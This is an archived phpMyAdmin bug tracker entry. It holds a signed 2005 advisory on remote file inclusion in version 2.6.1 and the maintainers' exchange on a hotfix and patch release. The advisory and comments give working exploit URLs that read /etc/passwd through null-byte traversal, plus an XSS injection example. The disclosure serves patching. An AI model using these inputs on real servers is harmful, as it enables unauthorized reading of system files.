#1609 (in 2.6.1-pl1) Remote file inclusion

2.6.1
invalid
None
1
2014-08-19
2005-02-22
No

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4]

Author: cXIb8O3
Date: 21.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in

Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files.

For exemple:

http://\[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

1.1
Or next include is in libraries/database_interface.lib.php

Code:

- ---
18# require_once('./libraries/dbi/' .
$cfg['Server']['extension'] . '.dbi.lib.php');
- ---

For exemple:

http://\[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------

Or if you want and if you see php error, can you make
xss with php buq. For Exemple:

http://\[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. How to fix ---

Download the new version of the script or update.

- --- 3. Greets ---

sp3x.

i need help.. :(

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCG5WfznmvyJCR4zQRAjwxAJ9iJkCGyD5HPMCbOjYb1WdR9HEcdwCgkHLO
2FuB5Nqz2rMTa1b26PMgzrk=
=oyWn
-----END PGP SIGNATURE-----

Discussion

  • Maksymilian Arciemowicz

    • priority: 5 --> 7
     
  • Alexander M. Turek

    • priority: 7 --> 5
     
  • Alexander M. Turek

    • summary: [phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4] --> (2.6.1) Remote file inclusion
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Bug confirmed.

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Maksymilian,

    Thank you for your report.

    Could you please give the attached file a try? It's a
    modified version of "libraries/grab_globals.lib.php" that
    contains a hotfix against your exploit.

     
  • Alexander M. Turek

    • assigned_to: nobody --> rabus
     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    /css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    /css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X
    in my machine bug exist with this
    libraries/grab_globals.lib.php. Varible $theme

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    OK, I misses to catch $GLOBALS. Please try the attached
    revision of grab_globals.lib.php.

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    ok ;] is good but now xss... check.. this xss..

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    > ok ;]

    OK then, let's consider this as fixed for now, although I
    don't like the way I did it. ;-)

    > is good but now xss... check.. this xss..

    Hey, I'm doing this in my freetime, buddy. On top of that, I
    don't want to fail my computer science exam, tomorrow. Don't
    rush me. :-)

     
  • Alexander M. Turek

    • priority: 5 --> 1
    • summary: (2.6.1) Remote file inclusion --> (in 2.6.2) Remote file inclusion
    • status: open --> open-fixed
     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    i sit in my i386 18/24 H . Is 2.6.2 final? I see only 2.6.1
    relase. And this bug is critical because many server have
    phpMyAdmin... i am waiting for a new version with patch :)

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    No, 2.6.2 is far away from being final. I think, this bug
    will force us to have a 2.6.1-pl1 release.

    If you need a quick fix, you can use the patched
    grab_globals.lib.php or checkout the QA_2_6_1 branch from CVS.

     
  • Alexander M. Turek

    • labels: --> 509104
     
  • Marc Delisle

    Marc Delisle - 2005-02-23

    Logged In: YES
    user_id=210714

    I cannot reproduce the XSS problem with your exploit,
    using unpatched phpMyAdmin 2.6.1.
    To work, it should display a message between <h1></h1> ?
    I don't see this happening.

     
  • Marc Delisle

    Marc Delisle - 2005-02-23
    • labels: 509104 -->
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Maksymilian,

    our CVS demo is outdated because of cron job problems at SF.
    This one should be more up to date:

    http://rabus.phpmyadmin.net/demos/CVS_LATEST

    By the way, we are still waiting for an answer from you to
    bug #1149383. :-)

     
  • Alexander M. Turek

    • summary: (in 2.6.2) Remote file inclusion --> (in 2.6.1-pl1) Remote file inclusion
     
  • Alexander M. Turek

    • status: open-fixed --> closed-fixed
     
  • Michal Čihař

    Michal Čihař - 2013-06-11
    • Status: closed-fixed --> invalid
     

Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:





No, thanks